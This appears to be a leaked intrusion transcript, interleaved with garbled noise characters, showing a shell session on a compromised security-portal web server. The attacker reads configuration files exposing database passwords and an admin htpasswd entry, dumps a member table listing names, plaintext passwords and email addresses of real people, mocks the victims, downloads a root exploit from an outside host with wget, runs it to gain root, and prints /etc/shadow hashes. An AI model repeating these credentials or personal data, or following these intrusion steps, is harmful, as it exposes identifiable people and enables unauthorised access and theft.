- n2 S/ o4 z/ r' a: Xdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend* f- T! H" o8 A3 h4 h% V
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
% o9 j. T) T' K) M$ S% [, ~-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg% P( ^8 w, {- `1 j. m: Q4 J; j
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config* E! ~) g2 K: Q/ V
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
/ O: B' C8 w4 E# p# ?: V. }drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
/ E. `: I- ]: @-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
( @+ V4 X# Y* x+ i1 y, q+ g O# T8 y-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico; {( s6 \* |' V$ G5 m
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed a6 J0 f, y# C8 N9 e7 U, c
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour% _) L7 }6 P% y7 U; E
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess1 j9 Q5 r; D9 G1 `3 p. @
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess: i- l2 g% A! {$ r" a$ D
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
) }+ y) C/ c9 q- t; [# z0 b5 _-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
3 B9 Q4 I8 v2 a' U4 N* l; t-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php1 R2 | _; h7 s2 u9 W. @) K
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php0 w- w4 `2 e7 a
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf; E* Y& x6 U- |8 Q; F8 L: r
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
0 O1 B, C& ^2 g* b1 O) ?2 W- {drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang2 h$ k) ?3 j$ t% u7 @" B0 R$ a6 p
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib' f8 C; |$ r+ k; \; f6 ~
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
) U. p, n9 O5 t" P* [4 cdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member" h# s2 f2 E: d0 p F
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
6 t' q: d" }; L; O& F. {& Y( f [drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
% e+ i/ D; Y- H7 B9 b; n0 v% Q-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf' Z/ _. B+ R+ _
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re9 _& N% r" k# ]1 n% u1 I
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
4 S$ s& X! a) hdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss+ C; f0 A- V4 D; g3 Z7 ^4 k( _
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources% v9 L3 k4 c; I7 ]6 r0 z
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com0 V6 Q, L! I2 E3 O6 z5 z
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
: \6 [ l( ?- E7 vdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
1 K! _6 _ \0 |9 Zdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl {- i V0 s+ Q' A; A9 l4 [8 o
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
% w Q9 |: i3 Z0 F* V4 jdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
, v3 E3 T! U+ @% Q# ~. r J7 [-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
1 C x. R; y$ z9 s6 gdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki; U" F3 t4 Z+ e2 I& K, B2 f
2 \0 D* B6 B9 j' H' S
sh-3.2$ head -20 index.php7 q& a8 `% [- Y5 o/ q
<?PHP
& E& I% I+ i( G/**; H- N+ y+ u: n! D$ B
* Mainfile (external) for astalavistaNET v2.0
; ?% d, f4 u1 S1 P*9 X* @6 h" c+ K5 p7 _% y/ a/ b5 ^
* @copyright Astalavista IT Engineering GmbH
5 z5 v; X8 O# Z- v! n' W* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>$ Y5 [) o: c, d* Z# w7 ?6 q
* @version 1.0
' j" e2 p v$ z; ~# X' N*/2 f6 r# B8 q: o& ~+ m8 r5 _* ~
# D3 J3 v) {* ~2 W
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {& m6 `/ I7 l" s9 T, P" T
$dontStartSession = false;4 s. m S9 g6 c2 P# `
} else {
$ k; O/ \8 q! q $dontStartSession = true;
: O3 y( e7 Y0 ^" Q+ p$ T$ z }
. d1 `& F& A' \! o, x+ c require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);$ K( g5 v- p2 x! V
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
' m6 h# z X. @- m require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
: J7 O: F! P5 j1 g6 }* f5 ^# b( K require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
$ x n$ c. j F/ n& g6 O, ^: n! m
& G* y" s2 u/ B2 q( s4 @- esh-3.2$ cd config& h. n- O9 T6 a# I
sh-3.2$ ls -la
0 T% g7 }" J1 l1 \$ n0 h& y! Vtotal 32
- K" }; Z6 Y' h0 wdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 ./ t4 [: L; f2 E R- S! Y0 j
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, u2 s7 A! k" E ]( t) m3 y-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php% S/ d1 w7 Y' h# G$ ?0 Z' u
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
6 q2 i" Q9 B" F7 ~ L o" P-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
( B, \ y$ R, p" S5 e& l-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php4 o4 w) W9 h* o; g U
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php$ Y7 a$ A# O2 N I9 b0 \$ ^% r7 i
5 w$ [9 ~5 F: z" e) L* i) L
sh-3.2$ cat com.conf.php
6 E j' l. k, H( p, }, W[snip]! o/ m( C4 N7 e: N4 o- {( ]) l
//member-database
. q9 U! y4 W: Y! d$_CONFIG['db_mem_server'] = ‘localhost’;1 O" ^* ~7 z/ i p0 ~2 @5 ^5 w
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
% z9 x7 K- C9 M- p+ n# d$_CONFIG['db_mem_user'] = ‘astanet_db’;, @7 F$ J5 v0 i2 f& d2 n
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
; s N+ I9 F- o$ j& C) p0 z$_CONFIG['db_mem_debug'] = false; //true or false
* p- M/ x3 k2 d1 [* ?//ads-database
5 y# W2 r) w+ r2 U. c- u3 C$_CONFIG['db_ads_server'] = ‘localhost’;
1 x( D+ A3 r6 z& S' M6 P1 N$_CONFIG['db_ads_database'] = ‘astanet_ads’;# `! \. G! `) x! [- D# l
$_CONFIG['db_ads_user'] = ‘astanet_db’;
, v; R: R6 @. F$ B4 n$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
% u/ z1 P! z& g/ J* t1 b$_CONFIG['db_ads_debug'] = false; //true or false4 ]3 Q% ~: N/ ^; e* R; N( a
//rainbow-database' U) o# w A8 p/ R9 S
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;2 A" g+ w( p# i1 f Z2 [6 H0 T
$_CONFIG['db_rainbow_database'] = ‘rainbow’;! K+ U+ c9 a+ V( l5 P8 v: a& `
$_CONFIG['db_rainbow_user'] = ‘dinu’;# `) H% K% ]0 M) ~+ f0 D
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;/ R8 J7 _( J- R0 C8 G
$_CONFIG['db_rainbow_debug'] = false; //true or false
8 I/ S- |' q6 l//mailing lists database
' e+ j4 `# t$ N: Y- V% `+ s$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
8 s' @/ @& i1 `* g9 B7 c$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;. V* h& G: P4 x% j7 }
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;5 a9 J J! V m- y
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
' @: V, U" B" C) A& E$_CONFIG['db_mailing_lists_debug'] = false; //true or false
. O7 W0 u$ ]0 V- t//paypal; j6 w" q( k/ L/ y+ X
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% Y& y7 b( B, }+ _1 T0 n/ Z
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;9 \1 b! Y: w! J/ T; ^6 V( ], X
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;- w% V5 s8 B' p4 S4 s
$_CONFIG['sub_pp_noship'] = ‘1′;4 C9 H( H' L: j% L5 D+ k" n7 ?
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
) S3 f/ u$ a4 \" r ^* |[snip]
6 H. u; \, B$ J. k9 \6 v8 Q9 [: N* p8 _' y: k) p1 T Z
sh-3.2$ cd ..* N) s# z4 P/ X
sh-3.2$ cd member5 _7 l/ {0 |; G) L& |, S6 Z9 ?' v! ~
sh-3.2$ ls -la
B8 O" ~6 E" k3 d, ]total 20+ P0 X4 n* V+ G2 w
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .# ~) j2 J0 k+ }- p; w# S; c. D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..( E' J7 \- g, _
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
% p3 `2 |4 p" c7 g' P1 s Q+ u-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php; W' ~4 J6 P; x) }% J5 ]0 V
sh-3.2$ cat .htaccess
2 |- J; C' j$ @6 |* e/ [$ k3 JSecFilterEngine off
- E9 d, a6 Q: z; r2 X. y |( I8 B- `" o+ V& `3 `6 _
sh-3.2$ cd ..* I- y/ s8 _. W7 s. ]# J, y! q. q
sh-3.2$ cd cron
5 x0 d$ Z. x7 \; m7 k; hsh-3.2$ ls -la
- N( F a# D# F; `, _% q6 ?total 168* F$ w' N t! A9 }3 U3 q4 c" o' F m
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
& [" m; N( `4 K) r; l. d2 ~9 N) s. mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- H( Q2 O6 h$ @) H$ u D
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php! t) A0 Y* t) {" H6 ] I
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
! j4 l; W* L. i& Z# ]-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php+ L( k* q5 Z5 [$ {
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php0 ^; \9 Y7 ^: H1 Q
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
0 M7 Q& q5 t r' P. ~/ n% Q-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php, o2 p1 T' V8 z( W. e$ M; S, V* J
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
7 Y5 u6 W7 X4 @-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php. X6 v. V5 [' }1 q" ^4 X
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
. o! ?2 Q9 B1 P-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php% h, l& e' o6 n [- j: S
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php1 t# ?0 V9 C1 b3 Y
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php+ P3 r) \' e, `, W
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh# E# f: L$ h; I( _
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
! v, }! ?5 C6 z: _-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
+ A! ~) H6 j( S: a% _" m-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
' x- A& @! T2 |& o4 Y6 E, c# g-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
% h# h( F* {" _+ ?# S% Q-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
' t/ Z1 ~' w$ |) u% q' h0 J6 `1 odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email; h+ S" g# c% j' j
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php4 E* T! e) b, a
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php/ `' s8 q& a! U! ~$ P& C
: U! h: B6 a3 B( Wsh-3.2$ cd ..
* C1 f3 z/ Q, b) a6 J+ ash-3.2$ cd _007
* x: z+ b. X5 Z; n( Dsh-3.2$ ls -la: m2 N. q# |8 E1 ~& P5 @$ `
total 24
3 L5 i3 K/ K4 y7 y& Zdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .+ v$ \$ I# @1 D, v8 `
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 t1 d& R; `+ X5 \-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess9 I3 w& r' y/ k
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
) W+ V' U8 H3 \- L3 `9 E; S, E1 @-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
8 s' Z, z2 P4 }2 ndrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
' p9 F- T% }0 [: K+ Y) t5 m3 r% r* u' |( {0 f
sh-3.2$ cat .htaccess
" t- V+ k5 z& d) a9 [9 b6 G3 |4 mauthType Basic- i, Q! t% j9 f' X0 V& L6 n7 _( @; s+ }
authName Admin+ u, d. Q Y& T4 ^9 Z0 G- j; V( j
authUserFile /home/astanet/auth/.htadm_pwd7 X( s+ H+ q+ d" C! @% q
require valid-user1 Y0 J% X- A+ V$ y4 |9 t
7 N J3 `" r1 s' {0 {" E( ~0 s( n
sh-3.2$ cat /home/astanet/auth/.htadm_pwd1 }$ c& ~( S/ ?4 f+ b
admin2net:CR0bl65MwhfT" Y0 U( @1 g7 n
" _, v# |* ~$ n2 M
sh-3.2$ mysql -u astanet_db -p
4 x6 E- n3 s" {Enter password:
$ M# F3 S6 W! rWelcome to the MySQL monitor. Commands end with ; or \g.
1 Y+ ~8 f' S" R" w/ @4 ^. rYour MySQL connection id is 275153" z1 c& L5 W$ ^+ S8 L) u0 Y
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
. C: F$ Z, k( C4 }6 t9 S+ u5 @3 e6 i6 r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 }: G% d* N9 n# T, \
) u+ G( L0 O/ y/ I) \( f$ j ^
mysql> show databases;
/ \! {4 G' Z$ W+———————–+
# x. g5 \' |$ L; \2 E, i| Database |4 ], ` o- X7 Z- G5 {$ _0 ^
+———————–+5 w) F2 y3 s* W# c
| information_schema |( T( \( X, n. O
| astanet_ads |9 z# F! n+ t2 o
| astanet_mailing_lists |! n0 I+ M! U; d+ z
| astanet_mediawiki |
. j D5 @+ N9 Z2 e5 b| astanet_membersystem |4 O4 n( I8 ^1 S3 l8 G! Y5 H
| test |
5 b7 D* I4 U7 c; o9 z$ d+———————–+
9 n; C4 |3 @9 P( Q. I7 N4 V1 ^6 rows in set (0.00 sec)/ ~! C5 o* v T
% v* [2 c9 X, B; Y7 a% u" Imysql> use astanet_membersystem5 z% g* F- B% f9 F
Database changed* E) V- n+ I" @) p) ^
mysql> show tables;3 s; r9 L# N9 A* ?4 J0 P s& A
+———————————–+& i! I* i9 R; \$ \! w* F
| Tables_in_astanet_membersystem |4 I5 i" J2 b$ f, Z
+———————————–+" U/ e+ Y% i# n$ O9 d
| blacklist_categories |! o! |) V; Y: T) W# w7 n; v, h
| blacklist_content |
4 V- }% N7 { R: e$ L$ M# ^| blacklist_levels |
+ ?/ L; u, N! Q) c! ]6 ^| blacklist_mcset |% x: M) }+ M6 D: _ y, l
| dir_categories |4 f8 t$ o# v! k4 C
| dir_comments |
, F; Q' I3 @6 Q* Y4 ^| dir_links |) \( x$ H+ o. P# r* d# s
| dir_temp |% E+ [/ m( [% X
| dir_votes |) L$ C+ C. c# ]0 C7 f
| documents |
' L; M }# n, V" w| documents_categories |( f, V% r" L+ w8 S6 |) p
| email_content |2 u3 Y# u0 s# R+ D1 G9 T& f ^% p
| email_settings |
. {* G5 W; ~1 i) ]( G| exploits |
3 Q6 p) H, `8 i9 n3 e: l3 A0 Y| exploits_categories |
3 I" u* u3 a0 |. M5 u! W; A5 K* [| exploittree_categories |
& j0 E! @' x$ g) f8 a4 g| exploittree_exploits |0 _3 }4 b- v I$ \: _& k
| home_values |3 Q4 K+ g! o5 `
| iso_countries |5 M' |5 c, w7 P8 r! y0 Z! ?: H
| links_categories |
9 w4 s" @' a+ ?2 ], O| links_records |, g* ~+ m, j- l
| links_unauth |% r7 O6 T% L: M1 |! x2 M* H4 F+ N
| links_votes |: e& Y- ~* N p, {
| log |* j5 ^- r1 U; W. _5 r2 x
| news_categories |
, R& k. q% o/ _7 _! b1 a: _3 V| news_comments |
& I& r. h O& s' m0 X4 K| news_emoticons |2 t6 Y6 M% P, U4 W$ A$ G1 b8 X+ v
| news_latest |
) u* J$ _, u/ `8 g* Y- Z| news_messages |) Q; Q% j# _2 \
| news_statistics |
9 m- U4 O# s' a| news_votes |
- l: R) b4 J; B| prices_content |3 K3 s; ^& ]. F+ _' ?% _
| prices_offers |# C- Q, |+ u& M; ?* Q+ B% x
| rss_settings |. q* j& ^ {- L0 t
| sessions |
; i8 x0 I; i: u| stats_signups |6 ]/ b$ ?& G$ @0 v7 S5 [
| u2u2 |
( ^7 E; W$ G# H0 x" [| u2u_contact |
' q9 \$ h$ I$ w0 G' I2 ^& o+ j| u2u_settings |
6 K0 K4 f/ P% S6 O7 `| user_keywords_selected_categories |
5 I$ I2 P, L% m. t$ a, s| users |
' ]- ^5 L& J) n# w7 }7 |4 F7 y| users_ipn_test |4 U( z2 O5 I& {" F6 x# Y
| users_keyword_values |
- Y; M# m) ]8 n1 i- C| users_profile |
) l5 z e% _' m! Y/ y1 {| users_temp |" E9 y1 @9 @# H& a" r$ G
| users_upgrade |+ f8 r8 d7 ~8 V, w C/ `+ T; T
+———————————–+
2 m6 X( i. O8 ]" J. a4 i46 rows in set (0.00 sec)
, `" B# ?- ~# a/ [3 y
% o* c r9 D! D$ Q$ ~mysql> describe users;1 i( ^. C5 S% X) j- t
+————————–+————————————–+——+—–+———————+—————-+
1 [; q* q! k) {1 }5 \$ L8 e| Field | Type | Null | Key | Default | Extra |
4 l. @7 |1 b$ W4 s1 J* ^+————————–+————————————–+——+—–+———————+—————-+0 K! j7 b+ w8 K! Q
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
3 U, V4 Z2 ?4 u5 ]* c' s| user | varchar(50) | NO | | | |
- F5 ]8 ?4 j; V! Q! [ v| nickname | varchar(30) | NO | MUL | anonymous | |/ O* A7 ~7 W0 k0 I
| password | varchar(30) | NO | | | |3 w5 K/ N( b6 N
| userlevel | tinyint(3) | YES | MUL | NULL | |
1 `9 a- I! A+ U( P; |- Y- a% U| exp | int(8) unsigned | NO | | 0 | |
1 D1 H( \( L, V| email | varchar(50) | NO | | | |. |" N% `; z" L' P. P7 _
| ip | varchar(15) | NO | | 0 | |, g7 j3 Z5 D; N' H& a
| proxy | set(’0′,’1′) | NO | | 0 | |
% @( K7 k2 L8 |# @| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
; p9 c w) F& U5 }' o| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
! q* D: w" h9 t4 A| anz_in | tinyint(1) | NO | | -1 | |+ r( w' g Z- V$ h
| status | tinyint(1) unsigned | NO | | 0 | |6 s- K, `8 r1 G/ O( C# d0 {9 d1 D
| checked | set(’0′,’1′,’2′) | NO | | 0 | |* e% }1 f Y4 V4 |& S* ^
| freemember | set(’0′,’1′) | NO | | 0 | |
1 s8 ?2 i2 [/ l$ K: k, s| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
2 U+ m" o, [( F5 x |% q| lang | tinytext | NO | | | |
/ |2 s) r8 w p| adid | smallint(6) | NO | | 0 | |
( d% b, \7 {3 g) \4 S, @| pp_txn_id | varchar(255) | YES | | NULL | |) y. O! R8 Q. |( {
| cnb_transaction_id | varchar(255) | YES | | NULL | |- Q+ p' B9 L- t; @( |5 i9 |7 w! Z3 z
| cnb_order_id | varchar(255) | YES | | NULL | |
$ m0 P* D+ ~$ g8 ?6 s, k' A| cnb_user_id | int(11) | YES | | 0 | |$ e& f( _/ t2 F' ?' }: O. D3 g
+————————–+————————————–+——+—–+———————+—————-+
- [; @2 a. i9 n& [8 n3 ^* H22 rows in set (0.01 sec)
" l8 h/ N8 ~# Q2 z. A' f0 s' G, P) x& k' k9 r; Q4 v% s
mysql> select count(*) as skids from users;9 A4 F6 |% k/ A/ O; i
+——-+
: C* F5 w2 a& n$ `2 _| skids | p. n$ T1 p, f
+——-+
|4 ^0 c$ U( Q9 ?4 {& H| 25199 |% y6 N6 b3 b4 q; X% d. \
+——-+7 N! {, ]9 \1 D( K: b, Z* @' }8 O
1 row in set (0.00 sec)8 a/ p# E0 o' g3 Z ~0 I
: T3 C, v: n$ d2 U* e0 F
mysql> select user,nickname,password,email from users where userlevel = 1;$ _; i# W& b" u) I, n
+————————–+———————-+——————+———————————–+
3 u& C; f, G3 }5 \$ L3 Y| user | nickname | password | email |: v* I0 ?' U5 m' }: W0 p# N Z
+————————–+———————-+——————+———————————–+% J8 y I0 z! J
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
( d, U3 \$ I; |1 ]/ y| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
' P3 W( w5 n! m) T7 m8 W @4 a| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |8 \) c" f* `' a1 I, { `: C
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |/ {. G1 e, s* @) {" h0 _; M/ b) L
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
) q3 ]5 K4 J) _: f6 `* ]| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |) k9 n3 W0 D! C
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |8 ~4 \- A- U% c% v( q+ J
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
1 N2 }$ @6 U" V& S0 R| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |6 k6 W( e8 Q; G
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |% M& g2 R7 I4 k& y9 ?
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
+ e& \2 v5 a$ b2 w' C) H| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
- [: p# `1 |5 Z, k+ W1 U| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |1 D8 X- R7 `) P; \$ o# E
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
8 F; @2 \% M8 f6 F6 w9 g| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
- x' H2 e( P/ H( v5 W4 o, k| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
7 x$ E) p( r2 p; X) z| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |0 J9 T- E( I' `8 ]. w/ {
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |1 p+ g# z5 c' e0 w* T
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |, L# i- y' V5 `" C
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |2 a% x( q& ]$ h5 i1 x( ~
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |9 |2 j- I" p+ z7 w8 R
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |' k% v5 p* ~9 b
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |! y& D. o) h( Z0 g3 `( m" x
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |* J) J, q* T0 Z: j& M: S) D
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |8 M( ^2 h; z+ k, [
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
8 l6 @2 F5 h: D/ n* ?: p| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |4 x9 N4 H+ ?6 }& m1 z6 e% k
+————————–+———————-+——————+———————————–+$ V% g0 [: I8 Z* k2 P
27 rows in set (0.00 sec)4 R5 l5 ~3 H! l
$ K6 X; J$ m- m2 t6 Omysql> exit;: f5 Y/ P0 e P+ d9 c1 ?6 Q: j
Bye
4 l. I( ]" n1 V& a. |/ i; }
1 g% B2 u6 d* w: |. L[~] plaintext passwords? yes,
: ?/ f6 h3 ?- \! P* aThose so called “security professionals” who charge you $6.66 / month to
( G) Q4 f I# y$ A, ]/ F ^register at their hack-proof portal, save your passwords in plaintext…
6 t9 E% N0 {% U7 v0 o! Obrilliant!
( G! e3 `3 L: ]# s+ ]1 _, P \9 Z* e- G
[~] This been fun but we want more.
7 p @3 q6 L! f- V: s! C& S2 E B% z9 `9 B6 q
sh-3.2$ uname -a* |( l" h6 W& h7 P- W
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+ M3 d+ f9 \: x4 x( ^) r5 rsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]7 [) m% a/ ]: m/ X0 \5 [ B
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
5 Q- ?% E& W. p {Resolving anti.sec.labs… 13.33.33.37
0 [2 c1 t+ m; rConnecting to anti.sec.labs|13.33.33.37|:80… connected." l q# u: k' c& j! r1 M
HTTP request sent, awaiting response… 200 OK
( K( ]2 a: K5 n3 m6 n6 }* m1 VLength: 18200 (18K) [text/plain]8 h8 k$ y* l) o- R B3 P
Saving to: `g0troot’
: R, I) L, W U3 @6 v
) H: X7 P- K; N5 j: a4 Y4 f2 r100%[=========================================================================================================================================>] 18,200 58.6K/s in
7 j. w( A3 r3 f8 V1 m% C0.3s3 I' o8 h# O9 ^, m
% j. u& G) @0 w6 N( f7 b18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]: s3 Z+ O. Z+ ?/ r
& I2 d6 o, ]. _) ^9 v6 V
sh-3.2$ ./g0troot -i x86_64( ?' X8 N$ n8 ^( I) U
[+] g0troot - anti.sec.labs
+ Y) x6 v7 _ L( e- d3 e- @, B[+] Target: 2.6.18-128.1.10.el5+ O( A7 y5 b1 D/ q! o
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]; X: o6 h. {; r9 R2 W$ F+ }" n5 k
: w' A) h4 }0 C* O# L
[+] r00tr00t1 s6 I: P/ x+ Z2 O9 \) V
[~] Executing shell…) w$ l: D+ @5 w& R0 n) q; s( F
: V, z- R, M# a1 t/ C/ m* `: @) a8 c
sh-3.2# id' w8 O% ^' Y' E& r$ V F
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
/ |; {' w5 i. L9 c6 L3 I4 c
" t$ n S; Q1 l2 U4 wsh-3.2# cat /etc/shadow4 f/ B, ~7 _- z* e$ B
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
# T/ } }( P0 I( K[snip]
$ a, B5 n3 X3 k) {. s0 @7 X7 Jadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::! R$ M1 k4 t y2 y# _- F& m9 m3 K
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::' c1 Q+ n% e. j5 ^% {
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::$ k: |- K! V$ W4 o
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::5 L% g' d$ O2 ^7 s$ r0 r6 }
3 X' c/ {/ f" s( d
sh-3.2# cat /etc/motd, g5 g. s( Z2 c2 }3 |5 e
